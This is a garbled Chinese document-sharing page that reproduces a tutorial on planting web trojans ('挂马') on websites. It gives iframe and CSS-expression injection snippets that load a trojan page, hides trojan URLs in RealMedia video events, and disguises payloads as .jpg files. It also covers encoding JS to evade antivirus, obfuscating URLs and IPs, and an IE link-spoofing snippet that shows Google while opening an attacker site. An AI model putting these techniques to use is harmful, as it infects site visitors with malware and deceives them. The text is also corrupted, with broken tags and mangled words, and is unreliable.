了解常用集中网站挂马和防范方法

《了解常用集中网站挂马和防范方法》由会员上传分享，免费在线阅读，更多相关内容在工程资料-天天文库。

1、了解常用集中网站挂马和防范方法～教育资源库　　1、挂马的N种方法　　(1)HTML挂马法。　　常规的HTML挂马方法一般是在网页中插入一条iframe语句，像<iframesrc=horse.htm/></iframe>;。不过第2种写法要注意：是原来的网页种要有body标签。　　3)在css中挂马。　　这个方法就是在css中写入body{hytop:expression(top.ument.body.innerHTML=top.ument.body.innerHTML+rn<iframesrc=horse.html/></iframe&

2、gt;);}　　然后在主页中调用这个CSS，代码类似pub/shockp;_rpexternal.arthack.org/horse.htm(00:00:10.0就是发生第一事件的时间，这里是让计算机弹出网页;00:00:30.0同样，这是第二次发生的时间，在0时0分第30秒0微妙时弹出窗口;而后面的URL地址就是连接指定的木马地址。)　　输入完毕后并保存，然后依次选择工具-合并事件，导入刚才的文本。当合并完成后，依次选择文本-Real文件另存为，保存好即可。　　最后把生成的视频文件发布网上，当对方观看同时就会连接到你指定的木马地址　　2、挂马的技巧　　挂马首先要求的是隐蔽性，这

3、样挂的时间才能长。像在S中挂马就是比较隐蔽了，但是还可再用到些技巧。　　(1)远程任意后缀执行HTML　　可以把horse.html改成horse.jpg之类的后缀，然后语句写成<iframesrc=/uploadfile/200902/20090220105353594.jpge>。js也可以，语句为<scriptsrc=/uploadfile/200902/20090220105353594.jpg></script>，甚至js的不要后缀名都可以。　　2)JS的加密　　为了保护网页木马的代码，可以把JS内容加密，还能躲开杀软的作用。如果使用

4、ENCODE加密方式，加密后的JS调用语句就用<scriptlanguage=jscript.encodesrc=.arthack.org/horse.txtgt;</script>。除此方法外，还有其它更多的方法！　　(3)URL的变形　　URL的变形方12下一页友情提醒：，特别！法也有很多，例如将url的16进制转换为encod编码等。如果是涉及到URL欺骗的方法就更多了，不过多数的URL欺骗，像利用的技巧，IE都已经打补丁了。但现在有个漏洞仍然有效，代码如下：<aid=CZYhref=.arthack.org></a><div

5、><ahref=.google.target=_blank><table><caption><ahref=.google.target=_blank><labelfor=CZY><ustyle=cursor:pointer:color:blue>Google</u></label></a></caption></table></a></div>　　保存该代码为网页后，鼠标移动到Google这个链接上时，IE状态栏显示的.

6、google.，但点击链接后却打开.arthack.org网站。如果你的网马可以用IP地址访问到的话，IP地址也可以进行转换的。像127.0.0.1这样的IP还可以变为2130706433、07f.000.000.001、0177.0000.0000.0001等等，这只不过是8进制、10进制、16进制、的转换而已。　　3、如何才能挂到马　　拿到了l源文件里的代码逻辑)。上一页12友情提醒：，特别！